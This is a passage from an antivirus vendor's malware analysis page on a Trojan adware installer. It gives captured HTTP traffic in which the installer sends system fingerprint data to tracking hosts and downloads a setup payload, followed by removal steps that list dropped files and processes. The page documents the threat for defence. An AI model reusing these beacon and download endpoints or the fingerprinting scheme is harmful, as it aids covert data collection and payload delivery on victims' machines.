Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=001504&i=700&n=deploy_ch_start_funnel_step_name&rnd=1425597850 HTTP/1.1


Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: c7R66s0PbI6RE2OyTOiCC/kkDREmnq8XI9Rrb31NiEInzxWmSTj6svYElmM6GGW3
x-amz-request-id: EEA240B973A1ED0B
Date: Thu, 05 Mar 2015 23:24:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=001504&i=800&n=deploy_nova_start_funnel_step_name&rnd=1425597850 HTTP/1.1


Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: jf4p2TpI1QvS4utE gh41cCrCUXngSXk9kIDTep6JbEcK98dPVUaxRXECXnpLHcC
x-amz-request-id: FBE2853165EBC225
Date: Thu, 05 Mar 2015 23:24:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=001504&i=900&n=deploy_ff_start_funnel_step_name&rnd=1425597850 HTTP/1.1


Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: vncs5DFxlxNe5vB3cTxcHPuo4uYeUPMRYUmU2TsEieD4MwiL4d6lbiXiNTtRveSD
x-amz-request-id: 324E8B4267AD49B1
Date: Thu, 05 Mar 2015 23:24:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=001504&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1425597850 HTTP/1.1


Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: T31DEGAF6h4dLzhlC422YM7O0Gl5KZ7sCd1d6z6yoij0mBcnDMp3bJk9sLrV/JT3
x-amz-request-id: BF691D9E6E248501
Date: Thu, 05 Mar 2015 23:24:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=001504&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1425597851 HTTP/1.1


Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: ttgnYaHLNdphi3cl2cTDyuw3wDrD9mFYxXExz2wOsce4Qf2LLcxOb9L72gQsFkhv
x-amz-request-id: C667B0063F2F2E11
Date: Thu, 05 Mar 2015 23:24:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=001504&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1425597851 HTTP/1.1


Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: l/XfenbIjxsKYwcGEyYw0ZvxKM/BB3qZcb8x/jIgM7qVoA0rMHto9 fjSHc1Dd i
x-amz-request-id: 535D90B37079E09D
Date: Thu, 05 Mar 2015 23:24:12 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: l/Xfen
bIjxsKYwcGEyYw0ZvxKM/BB3qZcb8x/jIgM7qVoA0rMHto9 fjSHc1Dd i..x-amz-requ
est-id: 535D90B37079E09D..Date: Thu, 05 Mar 2015 23:24:12 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=001504&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1425597851 HTTP/1.1


Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: GjC3mnbWhImS6Wr09zk2cotmx45tUhke1isOX 7XHJNlTycAlHMdwhOd7bFM4b6K
x-amz-request-id: ED30DA0F391DC5A2
Date: Thu, 05 Mar 2015 23:24:12 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=001504&i=10000&n=deploy_end_funnel_step_name&rnd=1425597852 HTTP/1.1


Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: Bg1LKYB9rFIZfFk8eM5mczTeInJb1ERcZkMR2FTGMF2uEoV/50FNN2GqmLo/GqCK
x-amz-request-id: 8EA97A25493FB8FC
Date: Thu, 05 Mar 2015 23:24:12 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: Bg1LKY
B9rFIZfFk8eM5mczTeInJb1ERcZkMR2FTGMF2uEoV/50FNN2GqmLo/GqCK..x-amz-requ
est-id: 8EA97A25493FB8FC..Date: Thu, 05 Mar 2015 23:24:12 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;..



GET /installer.gif?action=started&app=69829&appver=0&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_23&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350025&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=BlondieProject&mdat=jSdrW1Q0dDnRMURxifDRVgYdRC8Adht035Oiv/VdBFOgcLKuVjyLkwODo3ELBZAQlAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgKkkQlbgQ5FMRSd56ddLtowECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1425597843&procruntime=4&rnd=1425597847 HTTP/1.1
Host: stats.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: CI/xqrh7vLPioUT9C/lWQew4p49omDlNzRNIQi/xBgkXfaPPLX2CYk9Tx8Tri9jB
x-amz-request-id: C7467C452F157333
Date: Thu, 05 Mar 2015 23:24:08 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 25 Feb 2014 00:16:18 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: CI/xqr
h7vLPioUT9C/lWQew4p49omDlNzRNIQi/xBgkXfaPPLX2CYk9Tx8Tri9jB..x-amz-requ
est-id: C7467C452F157333..Date: Thu, 05 Mar 2015 23:24:08 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Tue, 25 Feb 2014 00:16:18 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....


GET /installer.gif?action=finished&LFMR=NA&app=69829&appver=&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_23&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350025&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=BlondieProject&procstarttime=1425597843&procruntime=9&rnd=1425597852 HTTP/1.1


Host: stats.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: vgIRq9xlWi7A2OtBmXsJCbotmSTVr5MK1z v0sz8o3fTTfSeKrYM1GfS4qpBlv w
x-amz-request-id: 3CBC5AFF8D68D5F6
Date: Thu, 05 Mar 2015 23:24:13 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 25 Feb 2014 00:16:18 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /apps.gif?action=install&app=69829&appver=&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&installtime=1425597843&lifetime=0&silent=1&crtnm=BlondieProject&procstarttime=1425597843&procruntime=9&rnd=1425597852 HTTP/1.1


Host: stats.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: u8LTwYQJKffKricroarszKXJRYq9a3kbqfiiuvLg3 TDit7DU3UnBq7Kkmq7saVP
x-amz-request-id: 338D1C02DC56E30B
Date: Thu, 05 Mar 2015 23:24:13 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 25 Feb 2014 00:16:09 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;..



GET /utility.gif?report=fdata&f=3&c=1504&i=20&n=ms_start_download&rnd=25649 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 05 Mar 2015 23:23:55 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..



GET /utility.gif?report=fdata&f=3&c=1504&i=35&n=ms_about_to_exc&rnd=8354 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 05 Mar 2015 23:24:00 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..



GET /outil/fuully/styi2/setup.exe_c HTTP/1.1
Host: dl.ourgenstatsstorage.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 23:23:55 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1425461996"
Last-Modified: Wed, 04 Mar 2015 09:39:56 GMT
Cache-Control: max-age=2512
Content-Length: 2530652
Content-Type: text/plain
X-HW: 1425597835.dop012.fr7.t,1425597835.cds019.fr7.sr,1425597834.dop003.dc1.r,1425597835.cds002.dc1.c,1425597835.cds019.fr7.pr
>.. ...Y:..<.J:.......[..B...s.......^..l)..(.F.3..<.._...af.
m..3...XX...X;/.m.T.]..E9........BZ....... ...;..F.....n...fN....e G.'
.o.....DR...>.?.H...U.wQi.r..,x.?.i./!..m....AZ.}1..V.s..X...>.`
.-]...l..^...M.<..z...W...e.1h\...N.O}.c<........h..E7..8i......
I3'9.. .G....R..c#......]....~..}jz..ZX.".yV....Q...v.....ZI..6....../
..<.^`]..2s...l.L....[M......W..0....nI.}#\.....d..2.y{....6...Th..
....4K.1`*'...sI.)_.`.SL....i..U.j.9?.2...1....H).D...D..U@:AYP^....V'
%.....!.....B0........E.[.H.".#.&..|f....X.1.#..N...d=K.......xU.....d
...).j*m-D#....<_.;IT.*.#\.s....../.Z.YD../g../..*.8...P.#..7....a.
.I...>.%..Oj5.u.............V`j.>.[|..F_..e..\ .@!..)...a....>
;..E..>.Wa..{.........NiT.a.a.JPu.....Co$...6t...."n)..C....?D,....
.%....F...(.;.<.{8...G....Oe...|.)..bs..=C......k....3....rr.....B.
 0@......~.I(.. .]...5.d....B[Ip1..%...SW*u&..A....E.~...;NYk.%...E0j:
Z...o...oV..t....~.......k.....#U..>M.KhPi.$..=q.k.a......QI.....r.
....#=...%.2..2g...u%..>..NhG..$.(....v........ .AFgpJ.s......Y.t4U
[email protected].=...g..............g.....=..().6..............{.-..f.......2....
%f.........=....o,...T;...Y,..(j..k.#.....pWE..B..'p.y7.&.....$c.d..a.
.s.g..x....U.%5..G2.b..n.....~..d...7...XWf0...5.f..D[.Eq.5Oog........
...!..u.......R.9~....G..K../........U.j......@)I.....m.$R.....C"...n.
....@..<..=1,$...O[T.......%.#.....R]...6...~y.{.<...{....j...p.
.3%..7.S... e.!....^w.....e.<.../....z0.^..r....I...tc.>.*.....t
..#.&dgks...0..F<Za..OK..=../.z.K..... ....S.RN...S..O.r.......
<<< skipped >>>


GET /utility.gif?report=fdata&f=3&c=1504&i=30&n=ms_download_success&rnd=7287 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 05 Mar 2015 23:23:59 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..



GET /utility.gif?error=start&report=mini_s&ver=1504&action=na&ms_vr=3&clock=0&rnd=20175 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 05 Mar 2015 23:23:54 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps were not found.


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    Ywuovtbypk.exe:468
    e33a47b.exe:324
    %original file name%.exe:228
    ping.exe:1948
    ping.exe:596
    ping.exe:1940
    ping.exe:336
    ping.exe:460
    ping.exe:320
    ping.exe:188
    ping.exe:496
    ping.exe:236

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %WinDir%\Tasks\46d65092-ed2d-4231-8c69-b8f9fa5cc9af-5.job (72 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb4.tmp (659658 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\nsisos.dll (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\md5dll.dll (6 bytes)
    %Program Files%\SavePass 1.1\UninstallBrw.exe (8281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\98225 (17420 bytes)
    %Program Files%\SavePass 1.1\46d65092-ed2d-4231-8c69-b8f9fa5cc9af-5.exe (7547 bytes)
    %Program Files%\SavePass 1.1\Uninstall.exe (601 bytes)
    %Program Files%\SavePass 1.1\utils.exe (80413 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\UserInfo.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\251151 (76466 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\InstallerUtils2.dll (3312 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\InstallerUtils.dll (28288 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\21AJ6FMR\ipgeoapi[1] (40 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\StdUtils.dll (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0VYLS3U5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\Ugwubcfcj.tmp (400738 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\21AJ6FMR\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WDMRK3AB\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_a (147399 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_b (147399 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_c (147399 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_d (147399 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_e (147399 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\11995.bat (407 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\StdUtils.dll (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\Ywuovtbypk.exe (5217358 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\FacebookIsGod.dll (2393 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now